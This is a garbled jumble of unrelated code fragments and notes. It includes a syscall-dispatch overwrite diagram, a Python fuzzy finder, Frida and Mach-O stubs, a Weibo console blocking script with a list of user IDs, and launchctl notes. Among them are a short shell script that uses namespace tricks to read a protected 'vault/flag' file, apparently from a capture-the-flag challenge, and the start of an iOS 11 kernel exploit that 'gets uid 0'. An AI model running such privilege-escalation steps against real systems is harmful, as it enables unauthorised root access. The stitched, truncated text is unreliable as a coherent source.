+------------------+
|These push their | +-----------------------+
|respective syscall| |This overwrites the |
|dispatch functions| |saved dispatch function|
|onto the stack | |with hndl_alltraps |
def fuzzyfinder(p, l):
    # Keep strings containing every character of p, ordered by where those characters first occur.
    scored = [(s, [s.find(c) for c in p]) for s in l]
    return [s for s, pos in sorted(scored, key=lambda t: t[1]) if -1 not in pos]
#!/bin/sh
echo 'sleep 600' | /tmp/unshare &
sleep 1;
echo 'echo -e "r\n/proc/self/fd/3/vault/flag" | /home/adam/vault_explorer' | /tmp/opendir /proc/$!/root
//
// main.c
// macho-syms
//
// Created by C0deH4cker on 3/19/16.
// Copyright © 2016 C0deH4cker. All rights reserved.
//
#include <stdio.h>
#include <stdlib.h>
$ clang -Wall -Os -pipe -g3 frida-gum-example.c -o frida-gum-example -L. -lfrida-gum -lresolv -Wl,-dead_strip -Wl,-no_compact_unwind
$ ./frida-gum-example
[*] open("/etc/hosts")
[*] close(3)
[*] open("/etc/fstab")
[*] close(-1)
[*] listener got 4 calls
[*] listener still has 4 calls
// HIServicesPrivate.h v1
// By ThatsJustCheesy
// TO USE THESE INTERFACES, you MUST link against ApplicationServices.framework.
#pragma once
#ifdef __cplusplus
extern "C" {
#endif
// 1. Open weibo.com in Chrome (make sure you are logged in to Weibo)
// 2. Open the developer tools, paste the code below into the console and press Enter
// Data source: https://github.com/yu961549745/WeiboBlackList
let dogs = [ 5471246591, 5209943797, 1709070650, 1887921907, 1824515351, 6031549751, 3477430640, 5303365027, 2397004535, 5014141958, 2357033797, 2253196910, 1282371413, 5433169859, 5577097996, 2477460747, 5791757379, 3973075219, 5480191060, 5064046310, 1794010902, 5241254653, 1775613335, 1749775825, 2898929101, 1766122373, 5330205046, 5836217079, 2143736030, 5088125436, 2122838230, 2379528185, 5768433920, 1588830357, 2734746975, 1702267517, 3305446403, 1922854483, 2240459775, 1713064495, 3141318761, 3049734521, 1297708027, 1670201221, 1113091931, 2682353630, 1889031894, 5736617825, 5573535479, 1787098822, 5474940961, 2647495542, 1978558182, 5675487085, 2066669447, 1410124131, 3318338712, 5117947348, 5984813988, 1935760780, 2106405744, 1658278557, 3123751063, 2418980745, 5612086708, 2822792580, 2728966594, 5651704821, 3174983660, 2884830430, 1409910532, 5289026864, 5460203843, 30409
// gets uid 0 (iOS 11)
// add patchfinder and you should be good
// Abraham Masri @cheesecakeufo
/*
 * Purpose: iterates over the procs and finds our proc
 */
uint64_t get_our_proc() {
// Moved here: https://github.com/Siguza/misc/blob/master/dsc_syms.c
I've never had a great understanding of launchctl, but the deprecation of the old commands with launchctl 2 (10.10) has been terrible, as all resources only cover the old commands, and documentation for Apple utilities is generally disgracefully bad, with launchctl not dissembling.
Mad props to https://babodee.wordpress.com/2016/04/09/launchctl-2-0-syntax/, which contains most details.
Internally, launchd has several domains, but launchctl 1 would only ask for service names,